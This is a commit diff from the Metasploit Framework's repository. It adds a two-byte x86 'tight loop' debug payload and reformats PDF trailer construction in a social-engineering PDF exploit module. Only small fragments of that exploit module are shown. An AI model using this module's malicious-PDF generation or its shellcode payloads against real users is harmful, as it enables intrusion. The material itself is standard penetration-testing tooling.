add payload/generic/tight_loop - x86 debug payload
git-svn-id: file:///home/svn/framework3/trunk@9070 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
56d50d6794
commit
321404e2fe
|
@ -67,8 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
trailers = pdf_objects[1]
|
trailers = pdf_objects[1]
|
||||||
startxrefs = pdf_objects[2]
|
startxrefs = pdf_objects[2]
|
||||||
root_obj = pdf_objects[3]
|
root_obj = pdf_objects[3]
|
||||||
|
|
||||||
|
|
||||||
output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last)
|
output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last)
|
||||||
|
|
||||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||||
|
@ -339,7 +338,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
if trailers[0].has_key?("ID")
|
if trailers[0].has_key?("ID")
|
||||||
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
|
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
|
||||||
else
|
else
|
||||||
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R>>\r\n"
|
new_pdf << "xref\r\n" << xrefs
|
||||||
|
new_pdf << "trailer\r\n"
|
||||||
|
new_pdf << "<</Size #{new_size}/Prev #{startxref}"
|
||||||
|
new_pdf << "/Root #{trailers[0].fetch("Root")} R"
|
||||||
|
new_pdf << "/Info #{trailers[0].fetch("Info")} R>>\r\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n"
|
new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n"
|
||||||
|
|
|
@ -0,0 +1,35 @@
|
||||||
|
##
|
||||||
|
# $Id$
|
||||||
|
##
|
||||||
|
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# Framework web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/framework/
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/payload/generic'
|
||||||
|
|
||||||
|
module Metasploit3
|
||||||
|
|
||||||
|
include Msf::Payload::Single
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'Generic x86 Tight Loop',
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'Description' => 'Generate a tight loop in the target process',
|
||||||
|
'Author' => 'jduck',
|
||||||
|
'Platform' => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Payload' => "\xeb\xfe" # jump to self
|
||||||
|
}
|
||||||
|
))
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
Loading…
Reference in New Issue